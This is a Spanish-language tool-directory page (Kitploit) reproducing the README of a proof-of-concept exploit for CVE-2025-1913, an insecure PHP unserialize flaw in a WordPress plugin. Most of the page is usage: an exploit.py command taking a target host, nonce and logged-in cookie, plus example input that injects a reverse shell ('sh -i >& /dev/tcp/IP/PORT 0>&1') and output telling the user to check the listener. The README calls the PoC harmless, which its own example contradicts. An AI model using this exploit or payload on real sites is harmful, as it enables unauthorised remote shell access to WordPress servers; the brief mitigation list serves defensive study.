Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-1913-PoC — Un PoC que demuestra CVE-2025-1913, mostrando cómo el manejo inseguro de unserialize del plugin puede conducir a impactos de alto riesgo en entornos controlados. Contiene una carga útil dañina solo para pruebas autorizadas. Úselo estrictamente en laboratorios aislados y para investigación defensiva. | Kitploit
Herramientas/GitHubGitHub/s0haib518-ksa/cve-2025-1913-poc
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebAprendizaje y EducaciónLabs y Práctica
GitHubs0haib518-ksa/cve-2025-1913-poc

CVE-2025-1913-PoC

Ver Repositorio

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
21hace 8 mesesAún no revisado

Acerca de

Un PoC que demuestra CVE-2025-1913, mostrando cómo el manejo inseguro de unserialize del plugin puede conducir a impactos de alto riesgo en entornos controlados. Contiene una carga útil dañina solo para pruebas autorizadas. Úselo estrictamente en laboratorios aislados y para investigación defensiva.

Compartir

CVE-2025-1913 -- Prueba de Concepto (PoC)

Este repositorio contiene una Prueba de Concepto (PoC) solo con fines educativos para CVE-2025-1913, creada por Suhaib518 🇸🇦. Esta PoC demuestra cómo una entrada de PHP serializada especialmente diseñada puede desencadenar lógica vulnerable en componentes de WordPress afectados. La PoC es segura y no incluye cargas útiles dañinas.

⚠️ Aviso legal: Esta PoC es solo para aprendizaje, investigación y pruebas de seguridad defensivas. NO lo use en servidores que no posea o para los que no tenga permiso explícito para realizar pruebas.


📌 Descripción general

La vulnerabilidad existe debido al manejo inseguro de datos serializados de PHP en ciertos flujos de trabajo de plugins de WordPress. Esta PoC muestra cómo un atacante podría proporcionar estructuras serializadas manipuladas que causen un comportamiento interno no deseado.

Este repositorio incluye un script de Python que:

  • Construye objetos PHP serializados personalizados
  • Los codifica para puntos finales de exportación basados en AJAX de WordPress
  • Envía una solicitud controlada para demostrar el problema de forma segura

📂 Archivos en este repositorio

root@kitploit:~
.
├── CVE-2025-1913-PoC.py         # El script PoC creado por Suhaib518 KSA
└── README.md                    # Documentación

🚀 Uso

1. Instalar requisitos

El script solo utiliza módulos integrados de Python excepto requests:

root@kitploit:~
pip install requests

2. Ejecutar el script de exploit interactivo

root@kitploit:~
python3 exploit.py \
  -c "Class" \
  -H "https://target.com" \
  --wp-nonce "1234567890" \
  --cookie "wordpress_logged_in=YOUR_COOKIE_HERE"

Se le preguntará:

  • Cuántas propiedades incluir
  • El nombre/valor de cada propiedad

Luego, el script las serializará, construirá una solicitud de WordPress y la enviará.


✔️ Comando de ejemplo (Flujo de explotación exitoso)

A continuación se muestra un comando de ejemplo que demuestra el uso con valores de ejemplo (estos no son maliciosos, solo muestran el proceso):

root@kitploit:~
python3 exploit.py   -c "WP_User_Query"   -H "https://example.com"   --wp-nonce "89f1a2b3c4"   --cookie "wordpress_logged_in_abc123=abcd1234efgh5678"

Respuestas de ejemplo a las preguntas interactivas:

root@kitploit:~
[?] ¿Cuántas propiedades tiene esta clase? 2
[?] Nombre de la propiedad #1: file
[?] Valor para 'file': shell.sh
[?] Nombre de la propiedad #2: shell
[?] Valor para 'shell': sh -i >& /dev/tcp/IP/PORT 0>&1

Luego, el script imprimirá:

root@kitploit:~
[*] Enviando solicitud…
....Verifique el listener para la shell.

🛡️ Mitigación (Alto nivel)

  • Evite usar unserialize() en entradas no confiables
  • Valide todos los parámetros de formularios y solicitudes AJAX
  • Mantenga los plugins actualizados
  • Utilice formatos de datos modernos como JSON en lugar de la serialización PHP

📜 Licencia

Licencia MIT.


🙌 Autor

Creado por Suhaib518 🇸🇦.

Descargar herramienta